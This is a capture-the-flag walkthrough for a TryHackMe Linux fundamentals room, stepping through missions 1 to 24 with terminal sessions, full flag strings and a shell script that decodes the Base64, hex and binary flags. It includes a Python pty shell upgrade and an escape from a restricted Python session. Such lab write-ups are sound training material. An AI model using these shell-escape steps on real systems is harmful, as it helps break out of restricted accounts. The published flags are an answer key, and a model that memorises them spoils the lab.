Tryhackme - Linux Agency

In this walkthrough, we will go through the Linux Agency room from TryHackMe. This room will help you sharpen your Linux skills and learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as it’s gonna be a tough ride. On that note, let’s get started.

Machine Info:

Title: Linuxagency 1.5
IP address: 10.10.86.7
Difficulty: Medium
Objective: This Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as it’s gonna be a tough ride.

Task 1 – Deploy The Machine

Task 2 – Let’s just jump in

Task 3 – Linux Fundamentals

Question 1 – What is the mission1 flag?

  • The first flag is already presented on the banner screen of your SSH login.

wh1terose@fsociety:~$ ssh agent47@10.10.86.7
The authenticity of host '10.10.86.7 (10.10.86.7)' can't be established.
ECDSA key fingerprint is SHA256:NPQ78ILJE6Ra+F9r/z2ZUWdpPGeAHnuNAc5kOaFbTjU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.86.7' (ECDSA) to the list of known hosts.
agent47@10.10.86.7's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

mission1{174dc8f191bcbb161fe25f8a5b58d1f0}
agent47@linuxagency:~$ 

mission1{174dc8f191bcbb161fe25f8a5b58d1f0}

Question 2 – What is the mission2 flag?

  • To move ahead, use the mission 1 flag string as the password for the user mission1. Listing that user’s home directory reveals the mission 2 flag. Use it in the same way to log in as mission2.

agent47@linuxagency:/home$ su mission1
Password: 
mission1@linuxagency:/home$ ls
0z09e    diana   maya       mission11  mission14  mission17  mission2   mission22  mission25  mission28  mission30  mission6  mission9  sean    xyan1d3
agent47  jordan  mission1   mission12  mission15  mission18  mission20  mission23  mission26  mission29  mission4   mission7  penelope  silvio
dalia    ken     mission10  mission13  mission16  mission19  mission21  mission24  mission27  mission3   mission5   mission8  reza      viktor
mission1@linuxagency:/home$ cd mission1
mission1@linuxagency:~$ ls
mission2{8a1b68bb11e4a35245061656b5b9fa0d}
mission1@linuxagency:~$ 

mission1@linuxagency:~$ su mission2
Password: 
mission2@linuxagency:/home/mission1$ 
mission2@linuxagency:/home/mission1$ 

mission2{8a1b68bb11e4a35245061656b5b9fa0d}

Question 3 – What is the mission3 flag?

  • Now, read the contents of the flag.txt using “cat” to reveal the mission 3 password.

mission2@linuxagency:/home$ cd mission2
mission2@linuxagency:~$ ls -l
total 4
-r-------- 1 mission2 mission2 43 Jan 12  2021 flag.txt
mission2@linuxagency:~$ cat flag.txt 
mission3{ab1e1ae5cba688340825103f70b0f976}
mission2@linuxagency:~$ 

mission3{ab1e1ae5cba688340825103f70b0f976}

Question 4 – What is the mission4 flag?

  • Using the mission 3 credentials found earlier, I switched to the mission3 user. Reading flag.txt with “cat” only prints a message saying that the flag has been stolen. But if we open the file in a text editor like “nano”, it gives us our flag.

mission2@linuxagency:~$ su mission3
Password: 
mission3@linuxagency:/home/mission2$ cd ..
mission3@linuxagency:/home$ cd mission3
mission3@linuxagency:~$ cat flag.txt 
I am really sorry man the flag is stolen by some thief's.
mission3@linuxagency:~$ 

mission4{264a7eeb920f80b3ee9665fafb7ff92d}

Question 5 – What is the mission5 flag?

  • For mission 5, read the contents of flag.txt in the flag directory inside the mission4 home folder.

mission3@linuxagency:/home$ su mission4
Password: 
mission4@linuxagency:/home$ cd mission4
mission4@linuxagency:~$ ls -la
total 20
drwxr-x---  3 mission4 mission4 4096 Jan 12  2021 .
drwxr-xr-x 45 root     root     4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission4 mission4    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission4 mission4 3771 Jan 12  2021 .bashrc
drwxr-xr-x  2 mission4 mission4 4096 Jan 12  2021 flag
-rw-r--r--  1 mission4 mission4  807 Jan 12  2021 .profile
mission4@linuxagency:~$ cd flag/
mission4@linuxagency:~/flag$ ls -la
total 12
drwxr-xr-x 2 mission4 mission4 4096 Jan 12  2021 .
drwxr-x--- 3 mission4 mission4 4096 Jan 12  2021 ..
-r-------- 1 mission4 mission4   43 Jan 12  2021 flag.txt
mission4@linuxagency:~/flag$ cat flag.txt 
mission5{bc67906710c3a376bcc7bd25978f62c0}
mission4@linuxagency:~/flag$ 

mission5{bc67906710c3a376bcc7bd25978f62c0}

Question 6 – What is the mission6 flag?

  • For the mission6 flag, read the hidden file – .flag.txt.

mission4@linuxagency:/home$ su mission5
Password: 
mission5@linuxagency:/home$ cd mission5
mission5@linuxagency:~$ ls -l
total 0
mission5@linuxagency:~$ pwd
/home/mission5
mission5@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission5 mission5 4096 Jan 12  2021 .
drwxr-xr-x 45 root     root     4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission5 mission5    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission5 mission5 3771 Jan 12  2021 .bashrc
-r--------  1 mission5 mission5   43 Jan 12  2021 .flag.txt
-rw-r--r--  1 mission5 mission5  807 Jan 12  2021 .profile
mission5@linuxagency:~$ cat .flag.txt 
mission6{1fa67e1adc244b5c6ea711f0c9675fde}
mission5@linuxagency:~$ 

mission6{1fa67e1adc244b5c6ea711f0c9675fde}

Question 7 – What is the mission7 flag?

  • The flag for mission7 is stored in a flag.txt file inside a hidden .flag directory.

mission5@linuxagency:/home$ su mission6
Password: 
mission6@linuxagency:/home$ cd mission6
mission6@linuxagency:~$ ls -la
total 20
drwxr-x---  3 mission6 mission6 4096 Jan 12  2021 .
drwxr-xr-x 45 root     root     4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission6 mission6    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission6 mission6 3771 Jan 12  2021 .bashrc
drwxr-xr-x  2 mission6 mission6 4096 Jan 12  2021 .flag
-rw-r--r--  1 mission6 mission6  807 Jan 12  2021 .profile
mission6@linuxagency:~$ cd .flag/
mission6@linuxagency:~/.flag$ ls -l
total 4
-r-------- 1 mission6 mission6 43 Jan 12  2021 flag.txt
mission6@linuxagency:~/.flag$ cat flag.txt a
mission7{53fd6b2bad6e85519c7403267225def5}
cat: a: No such file or directory
mission6@linuxagency:~/.flag$ cat flag.txt
mission7{53fd6b2bad6e85519c7403267225def5}
mission6@linuxagency:~/.flag$ 

mission7{53fd6b2bad6e85519c7403267225def5}

Question 8 – What is the mission8 flag?

mission6@linuxagency:/home$ su mission7
Password: 
bash: /home/mission6/.bashrc: Permission denied
mission7@linuxagency:/home$ cd mission7
mission7@linuxagency:/home/mission7$ ls -la
total 20
drwxr-x---  2 mission7 mission7 4096 Jan 12  2021 .
drwxr-xr-x 45 root     root     4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission7 mission7    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission7 mission7 3771 Jan 12  2021 .bashrc
-r--------  1 mission7 mission7   43 Jan 12  2021 flag.txt
-rw-r--r--  1 mission7 mission7  807 Jan 12  2021 .profile
mission7@linuxagency:/home/mission7$ cat flag.txt 
mission8{3bee25ebda7fe7dc0a9d2f481d10577b}
mission7@linuxagency:/home/mission7$ 

mission8{3bee25ebda7fe7dc0a9d2f481d10577b}

Question 9 – What is the mission9 flag?

  • This user has nothing in its home directory. Going up to the base directory (/), we found the flag for mission 9 there.

mission7@linuxagency:/home$ su mission8
Password: 
mission8@linuxagency:/home$ cd mission8
mission8@linuxagency:~$ ls -l
total 0
mission8@linuxagency:~$ cd ../..
mission8@linuxagency:/$ ls
bin   cdrom  etc       home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  dev    flag.txt  initrd.img  lib             lost+found  mnt    proc  run   snap  swapfile  tmp  var
mission8@linuxagency:/$ cat flag.txt 
mission9{ba1069363d182e1c114bef7521c898f5}
mission8@linuxagency:/$ 

mission9{ba1069363d182e1c114bef7521c898f5}

Question 10 – What is the mission10 flag?

  • Moving on to mission 10, here we have rockyou.txt too. We use the grep command to filter for occurrences of the flag name, which reveals the flag.

mission8@linuxagency:/home$ su mission9
Password: 
mission9@linuxagency:/home$ cd mission9
mission9@linuxagency:~$ ls -la
total 136664
drwxr-x---  2 mission9 mission9      4096 Jan 12  2021 .
drwxr-xr-x 45 root     root          4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission9 mission9         9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission9 mission9      3771 Jan 12  2021 .bashrc
-rw-r--r--  1 mission9 mission9       807 Jan 12  2021 .profile
-r--------  1 mission9 mission9 139921551 Jan 12  2021 rockyou.txt


mission9@linuxagency:~$ cat rockyou.txt | grep "mission10"
mission101
mission10
mission10{0c9d1c7c5683a1a29b05bb67856524b6}
mission1098
mission108
mission9@linuxagency:~$ 

mission10{0c9d1c7c5683a1a29b05bb67856524b6}

Question 11 – What is the mission11 flag?

  • As we can see, there is a directory called “folder” inside the mission10 home folder. It contains a tree of sub-directories. We use the grep command with the recursive option to get the mission 11 flag.

mission9@linuxagency:/home$ su mission10
Password: 
mission10@linuxagency:/home$ cd mission10
mission10@linuxagency:~$ ls -l
total 4
drwxr-xr-x 12 mission10 mission10 4096 Jan 12  2021 folder
mission10@linuxagency:~$ cd folder/
mission10@linuxagency:~/folder$ ls
L4D1  L4D10  L4D2  L4D3  L4D4  L4D5  L4D6  L4D7  L4D8  L4D9
mission10@linuxagency:~/folder$ grep -r "mission11"
L4D8/L3D7/L2D2/L1D10/flag.txt:mission11{db074d9b68f06246944b991d433180c0}
mission10@linuxagency:~/folder$ 

mission11{db074d9b68f06246944b991d433180c0}

Question 12 – What is the mission12 flag?

  • As per the question hint, we have to look into the environment variables. Listing them with the “env” command reveals the mission 12 flag.

mission10@linuxagency:/home$ su mission11
Password: 
mission11@linuxagency:/home$ cd mission11
mission11@linuxagency:~$ ls -la
total 20
drwxr-x---  3 mission11 mission11 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission11 mission11    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission11 mission11 3963 Jan 12  2021 .bashrc
drwxr-xr-x  3 mission11 mission11 4096 Jan 12  2021 .local
-rw-r--r--  1 mission11 mission11  807 Jan 12  2021 .profile
mission11@linuxagency:~$ env
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=10.18.11.103 58186 10.10.86.7 22
LESSCLOSE=/usr/bin/lesspipe %s %s
LANG=en_US.UTF-8
OLDPWD=/home
XDG_SESSION_ID=17
USER=mission11
PWD=/home/mission11
HOME=/home/mission11
SSH_CLIENT=10.18.11.103 58186 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_TTY=/dev/pts/0
MAIL=/var/mail/mission11
FLAG=mission12{f449a1d33d6edc327354635967f9a720}
SHELL=/bin/bash
TERM=xterm-256color
flag=mission12{f449a1d33d6edc327354635967f9a720}
SHLVL=12
LOGNAME=mission11
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
LESSOPEN=| /usr/bin/lesspipe %s
_=/usr/bin/env
mission11@linuxagency:~$ 

mission12{f449a1d33d6edc327354635967f9a720}

Question 13 – What is the mission13 flag?

  • Reading the flag.txt file fails with a permission denied error. Checking the permissions shows that none are set on the file. Adding the read permission and reading the file again gives us our flag.

mission11@linuxagency:/home$ su mission12
Password: 
mission12@linuxagency:/home$ cd mission12
mission12@linuxagency:~$ ls
flag.txt
mission12@linuxagency:~$ cat flag.txt 
cat: flag.txt: Permission denied
mission12@linuxagency:~$ ls -l
total 4
---------- 1 mission12 mission12 44 Jan 12  2021 flag.txt
mission12@linuxagency:~$ chmod +r flag.txt 
mission12@linuxagency:~$ ls -l
total 4
-r--r--r-- 1 mission12 mission12 44 Jan 12  2021 flag.txt
mission12@linuxagency:~$ cat flag.txt 
mission13{076124e360406b4c98ecefddd13ddb1f}
mission12@linuxagency:~$ 

mission13{076124e360406b4c98ecefddd13ddb1f}

Question 14 – What is the mission14 flag?

  • For this question, we have to decode a Base64 string to plain text to reveal the flag for mission 14.

mission12@linuxagency:/home$ su mission13
Password: 
mission13@linuxagency:/home$ cd mission13
mission13@linuxagency:~$ ls -la
total 28
drwxr-x---  3 mission13 mission13 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission13 mission13    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission13 mission13 3771 Jan 12  2021 .bashrc
-r--------  1 mission13 mission13   61 Jan 12  2021 flag.txt
drwxr-xr-x  3 mission13 mission13 4096 Jan 12  2021 .local
-rw-r--r--  1 mission13 mission13  807 Jan 12  2021 .profile
-rw-------  1 mission13 mission13  978 Jan 12  2021 .viminfo
mission13@linuxagency:~$ cat flag.txt 
bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=
mission13@linuxagency:~$ echo -n "bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=" | base64 --decode
mission14{d598de95639514b9941507617b9e54d2}
mission13@linuxagency:~$ 

mission14{d598de95639514b9941507617b9e54d2}

Question 15 – What is the mission15 flag?

  • Next, the flag file for this one contains binary data, which we decoded with CyberChef.

mission13@linuxagency:/home$ su mission14
Password: 
mission14@linuxagency:/home$ cd mission14
mission14@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission14 mission14 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission14 mission14    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission14 mission14 3771 Jan 12  2021 .bashrc
-r--------  1 mission14 mission14  345 Jan 12  2021 flag.txt
-rw-r--r--  1 mission14 mission14  807 Jan 12  2021 .profile
mission14@linuxagency:~$ cat flag.txt 
01101101011010010111001101110011011010010110111101101110001100010011010101111011011001100110001100110100001110010011000100110101011001000011100000110001001110000110001001100110011000010110010101100110011001100011000000110001001100010011100000110101011000110011001100110101001101000011011101100110001100100011010100110101001110010011011001111101
mission14@linuxagency:~$ 

mission15{fc4915d818bfaeff01185c3547f25596}

Question 16 – What is the mission16 flag?

  • We looked into the mission15 folder and found a flag.txt file. Reading it reveals an encoded string, which we decoded from hex to ASCII using CyberChef.

mission14@linuxagency:/home/agent47$ su mission15
Password: 
mission15@linuxagency:/home/agent47$ cd ..
mission15@linuxagency:/home$ cd mission15
mission15@linuxagency:~$ ls
flag.txt
mission15@linuxagency:~$ cat flag.txt 
6D697373696F6E31367B38383434313764343030333363346332303931623434643763323661393038657D
mission15@linuxagency:~$ 

mission16{884417d40033c4c2091b44d7c26a908e}
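
The decoding steps for the mission 14, 15 and 16 flags can also be done on the box with standard tools instead of CyberChef. The script below is an added example, not part of the original walkthrough; the function names are made up for illustration, and the samples are the flag.txt contents shown above (the binary one split into 8-bit groups for readability).

```shell
#!/bin/sh
# Added example: recognise and decode the binary, hex and Base64 strings
# from the walkthrough. Function names are hypothetical.

# decode_digits BASE WIDTH: read digits on stdin, emit one byte per WIDTH
# digits (2/8 for binary, 16/2 for hex). Fails on an invalid digit or on a
# byte that is not printable ASCII, which usually means a wrong guess.
decode_digits() {
    tr -d ' \t\r\n' | awk -v base="$1" -v width="$2" '
    BEGIN { digits = "0123456789abcdef" }
    {
        s = tolower($0)
        if (length(s) % width != 0) { failed = 1; exit 1 }
        for (i = 1; i <= length(s); i += width) {
            n = 0
            for (j = 0; j < width; j++) {
                d = index(digits, substr(s, i + j, 1)) - 1
                if (d < 0 || d >= base) { failed = 1; exit 1 }
                n = n * base + d
            }
            if (n != 9 && n != 10 && (n < 32 || n > 126)) { failed = 1; exit 1 }
            out = out sprintf("%c", n)
        }
    }
    END { if (!failed) printf "%s", out }'
}

# guess_encoding STRING: test the most restrictive alphabet first, because a
# binary string is also valid hex, and a hex string is also valid Base64.
guess_encoding() {
    s=$(printf '%s' "$1" | tr -d ' \t\r\n')
    len=${#s}
    if [ "$len" -eq 0 ]; then echo unknown; return; fi
    case $s in
        *[!01]*) ;;
        *) if [ $((len % 8)) -eq 0 ]; then echo binary; return; fi ;;
    esac
    case $s in
        *[!0-9A-Fa-f]*) ;;
        *) if [ $((len % 2)) -eq 0 ]; then echo hex; return; fi ;;
    esac
    case $s in
        *[!A-Za-z0-9+/=]*) echo unknown ;;
        *) if [ $((len % 4)) -eq 0 ]; then echo base64; else echo unknown; fi ;;
    esac
}

# auto_decode STRING: decode according to the guessed encoding.
auto_decode() {
    case $(guess_encoding "$1") in
        binary) printf '%s' "$1" | decode_digits 2 8 ;;
        hex)    printf '%s' "$1" | decode_digits 16 2 ;;
        base64) printf '%s' "$1" | tr -d ' \t\r\n' | base64 -d ;;
        *)      echo "unrecognised encoding" >&2; return 1 ;;
    esac
}

# flag.txt contents from the walkthrough (mission 14, 16 and 15 flags).
SAMPLE_B64='bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo='
SAMPLE_HEX='6D697373696F6E31367B38383434313764343030333363346332303931623434643763323661393038657D'
SAMPLE_BIN='01101101 01101001 01110011 01110011 01101001 01101111
01101110 00110001 00110101 01111011 01100110 01100011
00110100 00111001 00110001 00110101 01100100 00111000
00110001 00111000 01100010 01100110 01100001 01100101
01100110 01100110 00110000 00110001 00110001 00111000
00110101 01100011 00110011 00110101 00110100 00110111
01100110 00110010 00110101 00110101 00111001 00110110
01111101'

for sample in "$SAMPLE_B64" "$SAMPLE_BIN" "$SAMPLE_HEX"; do
    printf '%-7s -> %s\n' "$(guess_encoding "$sample")" "$(auto_decode "$sample")"
done
```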

Question 17 – What is the mission17 flag?

  • For this question, we logged in as mission16 and found a file in its home folder. The file is a binary, but no execute permission has been set on it. We set it with the +x flag and executed the file to reveal the flag.

mission15@linuxagency:~$ su mission16
Password: 
mission16@linuxagency:/home/mission15$ cd ..
mission16@linuxagency:/home$ cd mission16
mission16@linuxagency:~$ ls -l
total 12
-r-------- 1 mission16 mission16 8440 Jan 12  2021 flag
mission16@linuxagency:~$ chmod +x flag 
mission16@linuxagency:~$ ls -l
total 12
-r-x--x--x 1 mission16 mission16 8440 Jan 12  2021 flag
mission16@linuxagency:~$ ./flag 


mission17{49f8d1348a1053e221dfe7ff99f5cbf4}

mission16@linuxagency:~$ 

mission17{49f8d1348a1053e221dfe7ff99f5cbf4}

Question 18 – What is the mission18 flag?

  • This question deals with Java. First compile the flag.java file with javac and then execute it to reveal the flag.

mission16@linuxagency:~$ su mission17
Password: 
mission17@linuxagency:/home/mission16$ cd ..
mission17@linuxagency:/home$ cd mission17
mission17@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission17 mission17 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission17 mission17    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission17 mission17 3771 Jan 12  2021 .bashrc
-rwxr-xr-x  1 mission17 mission17  475 Jan 12  2021 flag.java
-rw-r--r--  1 mission17 mission17  807 Jan 12  2021 .profile


mission17@linuxagency:~$ javac flag.java 
mission17@linuxagency:~$ ls -l
total 8
-rw-rw-r-- 1 mission17 mission17 1199 Jun 20 07:58 flag.class
-rwxr-xr-x 1 mission17 mission17  475 Jan 12  2021 flag.java
mission17@linuxagency:~$ java flag 
mission18{f09760649986b489cda320ab5f7917e8}
mission17@linuxagency:~$ 

mission18{f09760649986b489cda320ab5f7917e8}

Question 19 – What is the mission19 flag?

  • Now we have to deal with a Ruby script. As we can see, the script does not have executable permission. First we set it and then run the script with the ruby command to get the flag.

mission17@linuxagency:~$ su mission18
Password: 
mission18@linuxagency:/home/mission17$ cd ..
mission18@linuxagency:/home$ cd mission18
mission18@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission18 mission18 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission18 mission18    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission18 mission18 3771 Jan 12  2021 .bashrc
-r--------  1 mission18 mission18  312 Jan 12  2021 flag.rb
-rw-r--r--  1 mission18 mission18  807 Jan 12  2021 .profile
mission18@linuxagency:~$ chmod +x flag.rb 
mission18@linuxagency:~$ ruby flag.rb 
mission19{a0bf41f56b3ac622d808f7a4385254b7}
mission18@linuxagency:~$ 

mission19{a0bf41f56b3ac622d808f7a4385254b7}

Question 20 – What is the mission20 flag?

  • Now we have come to C files. First we will compile it using gcc and then execute the compiled binary to get the flag.

mission18@linuxagency:~$ su mission19
Password: 
mission19@linuxagency:/home/mission18$ cd ..
mission19@linuxagency:/home$ cd mission19
mission19@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission19 mission19 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission19 mission19    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission19 mission19 3771 Jan 12  2021 .bashrc
-r--------  1 mission19 mission19  276 Jan 12  2021 flag.c
-rw-r--r--  1 mission19 mission19  807 Jan 12  2021 .profile
mission19@linuxagency:~$ chmod +x flag.c 
mission19@linuxagency:~$ gcc flag.c -o flag
flag.c: In function ‘main’:
flag.c:5:18: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration]
     int length = strlen(flag);
                  ^~~~~~
flag.c:5:18: warning: incompatible implicit declaration of built-in function ‘strlen’
flag.c:5:18: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
mission19@linuxagency:~$ ls -l
total 16
-rwxrwxr-x 1 mission19 mission19 8432 Jun 20 08:06 flag
-r-x--x--x 1 mission19 mission19  276 Jan 12  2021 flag.c
mission19@linuxagency:~$ ./flag
mission20{b0482f9e90c8ad2421bf4353cd8eae1c}

mission19@linuxagency:~$ 

mission20{b0482f9e90c8ad2421bf4353cd8eae1c}

Question 21 – What is the mission21 flag?

  • Now it’s time for our good old snake friend – Python. Execute the file with the python command to get the flag.

mission19@linuxagency:~$ su mission20
Password: 
mission20@linuxagency:/home/mission19$ cd ..
mission20@linuxagency:/home$ cd mission20
mission20@linuxagency:~$ ls -la
total 20
drwxr-x---  2 mission20 mission20 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission20 mission20    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission20 mission20 3771 Jan 12  2021 .bashrc
-r--------  1 mission20 mission20  186 Jan 12  2021 flag.py
-rw-r--r--  1 mission20 mission20  807 Jan 12  2021 .profile
mission20@linuxagency:~$ chmod +x flag.py 
mission20@linuxagency:~$ python flag.py 
mission21{7de756aabc528b446f6eb38419318f0c}
mission20@linuxagency:~$ 

mission21{7de756aabc528b446f6eb38419318f0c}

Question 22 – What is the mission22 flag?

  • For this particular task, there is no file holding the flag; instead we have to upgrade and stabilize the existing tty shell. I used Python to do so. Once the tty command was executed, the flag appeared on the screen.

mission20@linuxagency:~$ su mission21
Password: 
$ pwd
/home/mission20
$ cd mission21	
sh: 2: cd: can't cd to mission21
$ cd ..
$ cd mission21	
$ ls -la
total 20
drwxr-x---  3 mission21 mission21 4096 Jan 12  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission21 mission21    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission21 mission21 3853 Jan 12  2021 .bashrc
drwxr-xr-x  3 mission21 mission21 4096 Jan 12  2021 .local
-rw-r--r--  1 mission21 mission21  807 Jan 12  2021 .profile
$ python -c 'import pty;pty.spawn("/bin/bash")'
mission22{24caa74eb0889ed6a2e6984b42d49aaf}
mission21@linuxagency:~$ 

mission22{24caa74eb0889ed6a2e6984b42d49aaf}

Question 23 – What is the mission23 flag?

  • In this task, we get trapped inside a Python interactive shell session as soon as we log in as mission22. To break out of the environment, use the Python tty command to get the job done.

mission21@linuxagency:~$ su mission22
Password: 
Python 3.6.9 (default, Oct  8 2020, 12:12:24) 
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty; pty.spawn("/bin/bash")
mission22@linuxagency:/home/mission21$ cd ..
mission22@linuxagency:/home$ cd mission22
mission22@linuxagency:~$ ls -la
total 24
drwxr-x---  2 mission22 mission22 4096 Jun 20 08:20 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission22 mission22    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission22 mission22 3771 Jan 12  2021 .bashrc
-r--------  1 mission22 mission22   44 Jan 12  2021 flag.txt
-rw-r--r--  1 mission22 mission22  807 Jan 12  2021 .profile
-rw-------  1 mission22 mission22  409 Jun 20 08:20 .python_history
mission22@linuxagency:~$ cat flag.txt 
mission23{3710b9cb185282e3f61d2fd8b1b4ffea}
mission22@linuxagency:~$ 

mission23{3710b9cb185282e3f61d2fd8b1b4ffea}

Question 24 – What is the mission24 flag?

  • For this task, we got a hint in the home folder of mission23. After reading the hint, we looked into the /etc/hosts file and found an entry for a domain called mission24.com. Running curl against the domain returned the flag.

mission22@linuxagency:~$ su mission23
Password: 
mission23@linuxagency:/home/mission22$ cd ..
mission23@linuxagency:/home$ cd mission23
mission23@linuxagency:~$ ls -la
total 24
drwxr-x---  3 mission23 mission23 4096 Jan 15  2021 .
drwxr-xr-x 45 root      root      4096 Jan 12  2021 ..
lrwxrwxrwx  1 mission23 mission23    9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 mission23 mission23 3771 Jan 12  2021 .bashrc
drwxrwxr-x  3 mission23 mission23 4096 Jan 12  2021 .local
-r--------  1 mission23 mission23   69 Jan 15  2021 message.txt
-rw-r--r--  1 mission23 mission23  807 Jan 12  2021 .profile
mission23@linuxagency:~$ cat message.txt 
The hosts will help you.
[OPTIONAL] Maybe you will need curly hairs.
mission23@linuxagency:~$ cat /etc/hosts
127.0.0.1	localhost	linuxagency	mission24.com
127.0.1.1	ubuntu	linuxagency

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback	linuxagency
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
mission23@linuxagency:~$ curl mission24.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2016-11-16
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>mission24{dbaeb06591a7fd6230407df3a947b89c}</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
